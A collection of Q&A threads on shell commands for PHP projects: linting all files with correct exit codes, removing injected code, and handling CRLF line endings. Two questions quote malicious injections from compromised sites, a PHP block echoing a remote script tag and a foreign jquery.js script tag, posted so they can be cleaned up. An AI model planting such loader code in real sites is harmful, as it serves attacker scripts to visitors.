I would want to run strict syntax check:
$ php -d error_reporting=32767 -l test.php
for all php files inside my project in Travis CI.
I tried to use find but it always just returns 0 even if the command for exec flag fails
$ find . -type f -name "*.php" -exec php -d error_reporting=32767 -l {} \;
PHP Parse error: syntax error, unexpected end of file, expecting ',' or ';' in ./test.php on line 3
$ echo $?
0
I solved this by checking if the find + php returns anything into the STDERR.
before_script:
- '! find . -type f -name "*.php" -exec php -d error_reporting=32767 -l {} \; 2>&1 >&- | grep "^"'
How does this work? Adding:
2>&1 >&-
after any command removes STDOUT and redirects STDERR to STDOUT.
Then we can just check if the output contains any lines with grep:
| grep "^"
Then because grep returns 0 if it finds anything and 1 if it doesn't find anything we need to negate the end result by using exclamation mark in the start of this command. Otherwise this command would fail when everything is okay and success when things are failing.
Related
this gives me an error
sudo find . -type f -name '*.php' -exec sed -i 's/<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>//g' {} \;
sed: -e expression #1, char 44: unknown option to 's'
I am open to anything, i just need that pattern removed from every file and cannot seem to get it right. There are too many to go through manually.
Any help is greatly appreciated.
This entry in my Makefile happily crawls my PHP files and runs PHP's built-in lint on them:
lint:
#find . -name "*.php" | grep -v "^./lib" | grep -v "^./vendor" | xargs -I{} php -l '{}' | grep -v "No syntax errors detected"
The grep -v suppresses all the "No syntax errors detected" messages that would otherwise be produced while still failure messages, if any.
The problem is that make dies when there are no syntax errors and continues when there are errors. This is because of the exit code from grep -v. It thinks it has succeeded when it finds something (an error message) and failed when it finds nothing (all files passed lint).
I looked at negating the exit code of the final call to grep with !:
lint:
#find . -name "*.php" | grep -v "^./lib" | grep -v "^./vendor" | xargs -I{} php -l '{}' | ! grep -v "No syntax errors detected"
but that gives me:
/bin/sh: -c: line 0: syntax error near unexpected token `!'
I can use ! at the commandline fine but in this context it doesn't work for some reason.
I'm curious how I negate an exit code within the context of a pipeline/xargs/grep/make. But mostly I want to solve my problem - open to any suggestions that result in a working lint target in my Makefile that does the right thing.
Return value of pipe is one which is returned by its last command. So you need just revert status of full command line:
lint:
#! find ... | grep -v "No syntax errors detected"
All my .php file was appended a block of code like this:
<?php
#bbf007#
if(empty($r)) {
$r = "<script type=\"text/javascript\" src=\"http://web- ask.esy.es/m2nzgpzt.php?id=11101326\"></script>";
echo $r;
}
#/bbf007#
?>
I need to write a bash script with regular expression to remove this block out of code file. Please help me a suggestion.
Backup first!
The following will take all but the last 8 lines from all .php files within the current directory and it's subdirectories, and write them to a file called *.php.new:
find -name "*.php" | xargs -i sh -c 'head -n -8 {} > {}.new'
Then, move all the current php files to *.php.old:
find -name "*.php" | xargs -i sh -c 'mv {} {}.old'
Then, move the .php.new files to .php
find -name "*.php.new" | xargs -i sh -c 'mv {} `echo '{}' | head -c -5`'
I know for a fact that these PHP files exist. I can open them in VIM and see the offending character.
I found several links here on stackoverflow that suggest remedies for this but none of them work properly. I know for a fact that several files do not contain the ^M characters (CRLF line endings) however, I keep getting false positives.
find . -type f -name "*.php" -exec fgrep -l $'\r' "{}" \;
Returns false positives.
find . -not -type d -name "*.php" -exec file "{}" ";" | grep CRLF
Returns nothing.
etc...etc...
Edit: Yes, I am executing these lines in the offending directory.
Do you use a source control repository for storing your files? Many of them have the ability to automatically make sure that line endings of files are correct upon commit. I can give you an example with Subversion.
I have a pre-commit hook that allows me to specify what properties in Subversion must be on what files in order for those files to be committed. For example, I could specify that any file that ends in *.php must have the property svn:eol-style set to LF.
If you use this, you'll never have an issue with the ^M line endings again.
As for finding them, I've been able to do this:
$ find . -type f -exec egrep -l "^M$" {} \;
Where ^M is a Control-M. With Bash or Kornshell, you can get that by pressing Control-V, then Control-M. You might have to have set -o vi for it to work.
A little Perl can not only reveal the files but change them as desired. To find your culprits, do:
find . -type f -name "*.php" -exec perl -ne 'print $ARGV if m{\r$}' {} + > badstuff
Now, if you want to remove the pesky carriage return:
perl -pe 's{\r$}{}' $(<badstuff)
...which eliminates the carriage return from all of the affected files. If you want to do that and create a backup copy too, do:
perl -pi.old -e 's{\r$}{}' $(<badstuff)
I tend to use the instructions provided at http://kb.iu.edu/data/agiz.html to do this. The following will change the ^M in a specific file to a \n return and place that into a new file using tr:
tr '\r' '\n' < macfile.txt > unixfile.txt
This does the same thing just using perl instead. With this one you can probably pipe in a series of files:
perl -p -e 's/\r/\n/g' < macfile.txt > unixfile.txt
The file command will tell you which kinds of line-end characters it sees:
$ file to-do.txt
to-do.txt: ASCII text, with CRLF line terminators
$ file mixed.txt
mixed.txt: ASCII text, with CRLF, LF line terminators
So you could run e.g.
find . -type f -name "*.php" -exec file "{}" \; | grep -c CRLF
to count the number of files that have at least some CRLF line endings.
You could also use dos2unix or fromdos to convert them all to LF only:
find . -type f -name "*.php" -exec dos2unix "{}" \;
You might also care if these tools would touch all of the files, or just the ones that have to be converted; check the tool documentation
ls -1 *.php | xargs php -l doesn't work, any clues why ? (it only checks the first file)
I am trying to detect parse errors in my whole application.
Thank you.
EDIT:
Came up with this, it is sufficient for my needs:
#!/bin/sh
for chave in `find . | grep .php` ; do
php -l $chave
done
find . -name '*.php' -print0 | xargs -0 -L 1 php -l
This has the added bonus of working no matter what characters your filenames contain. Unfortunately I'm not sure why it's not working without the -L 1 part :(
Only print the once that fails:
find . -name '*.php' -print0 | xargs -0 -L 1 php -l | grep -v 'No syntax errors detected in ./'